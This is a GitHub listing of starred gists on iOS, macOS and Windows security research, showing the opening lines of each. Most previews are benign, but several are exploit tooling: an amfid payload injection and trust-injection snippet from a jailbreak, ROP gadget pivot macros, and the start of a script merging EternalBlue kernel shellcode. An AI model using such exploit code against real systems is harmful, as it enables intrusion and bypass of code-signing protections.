Skip to content

Instantly share code, notes, and snippets.

View jmpews's full-sized avatar
🌴
Zzzzzzz

jmpews(AKA.zz) jmpews

🌴
Zzzzzzz
1.1k followers · 173 following
View GitHub Profile
@imbushuo
imbushuo / simplevm.c
Last active July 27, 2024 09:44
Demonstrates Hypervisor.Framework usage in Apple Silicon
// simplevm.c: demonstrates Hypervisor.Framework usage in Apple Silicon
// Based on the work by @zhuowei
// @imbushuo - Nov 2020
// To build:
// Prepare the entitlement with BOTH com.apple.security.hypervisor and com.apple.vm.networking WHEN SIP IS OFF
// Prepare the entitlement com.apple.security.hypervisor and NO com.apple.vm.networking WHEN SIP IS ON
// ^ Per @never_released, tested on 11.0.1, idk why
// clang -o simplevm -O2 -framework Hypervisor -mmacosx-version-min=11.0 simplevm.c
// codesign --entitlements simplevm.entitlements --force -s - simplevm
@PsychoTea
PsychoTea / amfid.c
Created February 18, 2019 01:23
amfid_payload w/ task_for_pid-allow patch
{
COPY_RESOURCE("amfid_payload.dylib", "/jb/amfid_payload.dylib");
inject_trust("/jb/amfid_payload.dylib");
uint32_t amfid_pid = get_pid_for_name("amfid");
uint64_t osbool_val = rk64(offs.data.osboolean_true + kernel_slide);
VAL_CHECK(osbool_val);
@knightsc
knightsc / build-xnu-4903.221.2.sh
Last active August 25, 2019 12:07
A script to build XNU version 4903.221.2 (macOS Mojave 10.14.1).
#! /bin/bash
#
# build-xnu-4903.221.2.sh
# Scott Knight
#
# Based on the script by Brandon Azad
# https://gist.github.com/bazad/654959120a423b226dc564073b435453
#
# A script showing how to build XNU version 4903.221.2 on macOS Mojave
# 10.14 with Xcode 10.1.
@stefanesser
stefanesser / BHEU.markdown
Last active July 8, 2024 08:41
BlackHat EU - Wrong information in Talk "Eternal War in XNU Kernel Objects"

It has come to my attention that BlackHat EU had talks from Alibaba Security about iOS security topics. It seems to be from the same people that have previously presented at DEFCON. Back then I had publicly discussed how their talk is basically just a summary of other people's work that is heavily miscredited to the wrong people.

Considering this history it is surprising that BlackHat would allow the same people to give a talk again on iOS security topics. But I have given up a long time ago on the BlackHat review board and their decisions, which is one of the reasons why I have stopped submitting to them years ago.

But I am digressing from the actual reason for this GIST. And no it is not about the fact that the talk once again starts with summarizing other people's work and crediting the wrong parties for the work done. In this GIST I want to go over one of the slides from the "summary part" of the talk, because not a single item on that slide is correct information.

So here is the offending slide:

![Fr

@xerub
xerub / pivot16.c
Created December 5, 2018 19:35
#include <stdio.h>
#include <stdlib.h>
#define L(x) ((x) / 8)
#define GADGET(name, insns) \
extern int name[]; \
__asm(".globl _" #name "\n" \
".p2align 2\n" \
"_" #name ":\n" \
@argp
argp / 11.4-vs-12.0b2-sb-operations.diff
Created June 26, 2018 10:37
iOS 11.4 vs 12.0b2 sandbox kext operations
--- operations-iOS-11.4-15F79.txt 2018-06-26 13:30:06.556874870 +0300
+++ operations-iOS-12.0-b2-16A5308e.txt 2018-06-26 13:30:06.556874870 +0300
@@ -5,6 +5,7 @@
[xxx] operation: device*
[xxx] operation: device-camera
[xxx] operation: device-microphone
+[xxx] operation: darwin-notification-post
[xxx] operation: distributed-notification-post
[xxx] operation: dynamic-code-generation
[xxx] operation: file*
@Siguza
Siguza / JBdetection.md
Created March 18, 2018 03:19

Thoughts on jailbreak detection

The controversy of jailbreak detection has been brought up multiple times in my Twitter feed, so in order to not have to repeat myself, I'll write my thoughts down here.
One day I'll hopefully get round to set up a realistic blog and then I'll move this there, but for now I'll just dump it here on GitHub.

Motivation

Hi. I'm Siguza, and among other things I write exploits for a hobby and help make jailbreaks. One of the reasons I do that is because I believe we should have the ability to run whatever we want on our iDevices, just as we do with laptops and desktop computers. Now, a lot of app developers however seem to despise jailbreaks, and try to make their apps refuse service on jailbroken devices. I think that firstly sucks big time, and secondly always misses the point. From what I gathered, the two arguments for using jailbreak detection seem to be:

  • "J
@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@yrp604
yrp604 / xnu-syscall-life-amd64.md
Last active October 2, 2023 15:59
The life of an XNU unix syscall on amd64

XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |
@oleavr
oleavr / frida-core-1.0.vapi
Last active January 20, 2024 03:15
The frida-core API consumed by bindings like frida-python, frida-qml, etc.
[CCode (cheader_filename = "frida-core.h", cprefix = "Frida", lower_case_cprefix = "frida_")]
namespace Frida {
public static void init ();
public static void shutdown ();
public static void deinit ();
public static unowned GLib.MainContext get_main_context ();
public class DeviceManager : GLib.Object {
public DeviceManager ();